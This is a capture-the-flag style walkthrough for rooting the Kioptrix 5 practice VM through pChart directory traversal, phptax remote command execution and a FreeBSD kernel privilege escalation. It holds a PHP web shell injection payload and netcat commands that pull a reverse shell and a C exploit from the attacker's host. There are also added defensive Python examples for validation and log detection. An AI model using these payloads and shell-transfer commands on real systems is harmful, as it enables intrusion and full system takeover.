Rooting Kioptrix 5 Walkthrough


Kioptrix 5 is a boot-to-root (B2R) VM designed for students to practice vulnerability analysis and exploitation. The objective is to root this virtual machine by exploiting its vulnerabilities, leading to full system compromise.

Vulnerabilities Exploited:

  • Local File Inclusion
  • Remote Command Execution in the phptax application
  • FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation

Lab Setup:

  • VMware Workstation for the virtual machines
  • Kali Linux VM in Bridge mode
  • Kioptrix Final in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap



root@kali:~# netdiscover

 Currently scanning:   |   Screen View: Unique Hosts
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
                 00:0c:29:75:b1:92      1      60  VMware, Inc.

Target VM IP Address:

Scanning with nmap

root@kali:~# nmap -p- -A
Starting Nmap 7.70 ( ) at 2018-05-30 23:27 EDT
Nmap scan report for
Host is up (0.00059s latency).
Not shown: 65532 filtered ports
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
MAC Address: 00:0C:29:75:B1:92 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
1   0.59 ms
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 136.26 seconds

Let's explore the services on the open ports. A web server is running on port 8080, but every resource on it is forbidden (403), so we don't have access to this server yet.

Moving forward, the default page is visible for the website on port 80.

Viewing the page source gives us a hint: a comment points to the pChart version 2.1.3 application.

Here is our pChart application.


Let's search Exploit-DB for pChart exploits.


root@kali:~# searchsploit pChart 2.1.3
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title                                                                              |  Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                     | exploits/php/webapps/31173.txt
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

So there is a directory traversal vulnerability that allows us to read arbitrary files from the server.

The next part of the story: we are forbidden from accessing any resource on port 8080, and that restriction is configured in the web server's httpd.conf. So let's read httpd.conf, see what configuration is in place, and work out what we can do to bypass that restriction.

As we can see, access to the server is only allowed for browsers whose User-Agent string starts with ^Mozilla/4.0.

So I overrode the user agent string in Firefox to Mozilla/4.0.

A new string preference, general.useragent.override, was created with the value Mozilla/4.0.



Access to server is granted.

Now we find the phptax application. Let's search for exploits. And, guess what, there is a remote command execution vulnerability: we can execute arbitrary commands on the server.

root@kali:~# searchsploit phptax
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title                                                                              |  Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)                              | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution                           | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                                          | exploits/php/webapps/21665.txt
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Let's read through the exploit text.

root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/21665.txt
phptax 0.8 <= Remote Code Execution Vulnerability
Discovered by: Jean Pascal Pereira <>
Vendor information:
"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.
The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot."
Vendor URI:
Risk-level: High
The application is prone to a remote code execution vulnerability.
drawimage.php, line 63:
include ("./files/$_GET[pfilez]");
// makes a png image
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
** Exploit-DB Verified:**
Do some input validation.
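The advisory closes with "Do some input validation" but does not show what that looks like. The following is an added example, not code from the walkthrough, phptax or pChart: it is written in Python so it runs stand-alone, and it models both flaws chained on this box, a user-supplied filename spliced into a file path (pChart's directory traversal, phptax's include("./files/$_GET[pfilez]")) and then into a shell command (phptax's exec("convert ...")). The files directory, the sample form names and the "convert" argv are assumptions made for the example.

```python
# Added example (not part of the walkthrough, phptax or pChart): the input
# validation the advisory asks for, in Python. It models a filename that is
# spliced into a file path and then into a shell command.
import os
import re
import tempfile
from typing import List, Optional

# Constructed sample: a directory holding the only files a request may name.
FILES_DIR = tempfile.mkdtemp(prefix="tax_files_")
for _name in ("form1040.tob", "scheduleA.tob"):
    with open(os.path.join(FILES_DIR, _name), "w") as _fh:
        _fh.write("sample form data\n")

# A plain filename: conservative character set, no separators, no leading dot.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def resolve_form_file(pfilez: str, base_dir: str = FILES_DIR) -> Optional[str]:
    """Map an untrusted 'pfilez' value to a file under base_dir, or None.

    Rejects path separators and traversal ("../", "/etc/passwd"), shell
    metacharacters and whitespace, and any name that still resolves outside
    base_dir once symlinks are followed.
    """
    if not SAFE_NAME.fullmatch(pfilez) or ".." in pfilez:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, pfilez))
    # Containment check: the resolved path must sit strictly under base_dir.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def build_convert_argv(pfilez: str, out_dir: str) -> Optional[List[str]]:
    """Build the 'convert' command as an argv list, never as a shell string.

    Passing this list to subprocess.run() with shell=False means /bin/sh never
    parses the arguments, so a value like "x; id" cannot become a second
    command even if it slipped past validation (here it does not).
    """
    src = resolve_form_file(pfilez)
    if src is None:
        return None
    stem = os.path.splitext(os.path.basename(src))[0]
    return ["convert", src, os.path.join(out_dir, stem + ".pdf")]


if __name__ == "__main__":
    for probe in ("form1040.tob", "../../../etc/passwd", "form1040.tob; id", "missing.tob"):
        print(f"{probe!r:32} -> {build_convert_argv(probe, '/tmp')}")
```

The two checks are deliberately separate: the allowlist regex rejects anything that is not a plain filename, and the realpath containment check catches whatever the regex might miss (a symlink inside the directory pointing elsewhere, for instance). Building the command as an argv list removes the shell from the picture entirely, which is the fix for the exec() line in drawimage.php.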

We want to execute this command in the server's shell.

echo "<?php system(\$_GET['cmd']); ?>" > shell.php

This command creates a simple PHP shell that can execute commands. URL-encoded and passed through the vulnerable request, the payload looks like this:

;%20echo%20%22%3C%3Fphp%20system($_GET%5B%27cmd%27%5D);%20%3F%3E%22%20%3E%20shell.php&pdf=make

Our shell is uploaded and we can execute commands. Let's find out whether wget or nc is installed on the server.

nc is installed.

Let's use nc to get an interactive shell. We will upload pentestmonkey's PHP netcat shell.

root@kali:~# nc -nvlp 1234 < /var/www/html/shell.txt

listening on [any] 1234 ...

On the server, we upload the PHP shell using this command.

nc 1234 > rshell.php

So our rshell.php is uploaded. Let's access rshell.php in the browser and receive the reverse-connect netcat shell.
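Everything in the web phase above leaves traces in the Apache access log: the traversal requests against pChart, the metacharacters in the pfilez parameter, and the bare "Mozilla/4.0" User-Agent used to satisfy the httpd.conf allow rule, which no real browser sends on its own. The following detection logic is an added example, not part of the walkthrough; the log lines are constructed for it (the IPs, timestamps, sizes and the pChart "file" parameter name are made up), and the allow-list prefix is taken from the rule described above.

```python
# Added example (not part of the walkthrough): detection logic a defender can
# run over Apache access logs for the two web-side techniques used on this box:
# (1) directory traversal or shell metacharacters in request parameters
#     (pChart's file read, phptax's pfilez injection), and
# (2) requests whose User-Agent is exactly the bare allow-list prefix
#     "Mozilla/4.0" from the httpd.conf rule, which no real browser sends.
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Constructed sample log lines in Apache "combined" format. IPs, timestamps,
# sizes and the pChart "file" parameter are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [30/May/2018:23:40:01 -0400] "GET /pChart2.1.3/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.0.0.5 - - [30/May/2018:23:41:12 -0400] "GET /pChart2.1.3/index.php?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.0.0.5 - - [30/May/2018:23:44:30 -0400] "GET /phptax/index.php HTTP/1.1" 200 3400 "-" "Mozilla/4.0"
10.0.0.5 - - [30/May/2018:23:45:02 -0400] "GET /phptax/drawimage.php?pfilez=xxx;%20id&pdf=make HTTP/1.1" 200 0 "-" "Mozilla/4.0"
10.0.0.9 - - [30/May/2018:23:50:00 -0400] "GET /phptax/drawimage.php?pfilez=form1040.tob&pdf=make HTTP/1.1" 200 2200 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL = re.compile(r"\.\.[/\\]")
SHELL_META = re.compile(r"[;|&`$]")
ALLOWED_UA_PREFIX = "Mozilla/4.0"  # prefix the httpd.conf allow rule matched on


def analyse_request(line: str) -> Optional[Dict[str, object]]:
    """Parse one log line and return its findings (empty list if clean)."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings: List[str] = []
    url = urlsplit(m.group("path"))
    # Decode twice so double-encoded payloads (%252e%252e%252f) are caught too.
    values = [unquote(unquote(url.path))]
    for param in url.query.split("&"):
        _key, _, raw_value = param.partition("=")
        values.append(unquote(unquote(raw_value)))
    if any(TRAVERSAL.search(v) for v in values):
        findings.append("directory-traversal")
    if any(SHELL_META.search(v) for v in values[1:]):
        findings.append("shell-metacharacters-in-query")
    if m.group("ua") == ALLOWED_UA_PREFIX:
        findings.append("bare-allowlist-user-agent")
    return {"ip": m.group("ip"), "path": m.group("path"), "findings": findings}


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return only the parsed requests that triggered at least one finding."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = analyse_request(line)
        if rec and rec["findings"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        print(f'{rec["ip"]} {rec["path"]} -> {", ".join(rec["findings"])}')
```

The query string is split on "&" before decoding so that a ";" or "|" inside a parameter value is not mistaken for a separator, and each value is decoded twice so a double-encoded traversal is still seen. The User-Agent rule is the cheap signal: a real browser sends a long product string, so a request whose User-Agent is nothing but the allow-list prefix is worth a look on its own.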

Privilege Escalation

$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012  amd64

On Kali Linux: # nc -nvlp 12345 < exploit.c

I transferred this C exploit source to the server using nc, compiled it, executed it, and rooted the machine!

$ nc 12345 > /tmp/exploit.c
$ cd /tmp
$ gcc -o exploit exploit.c
$ ./exploit
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

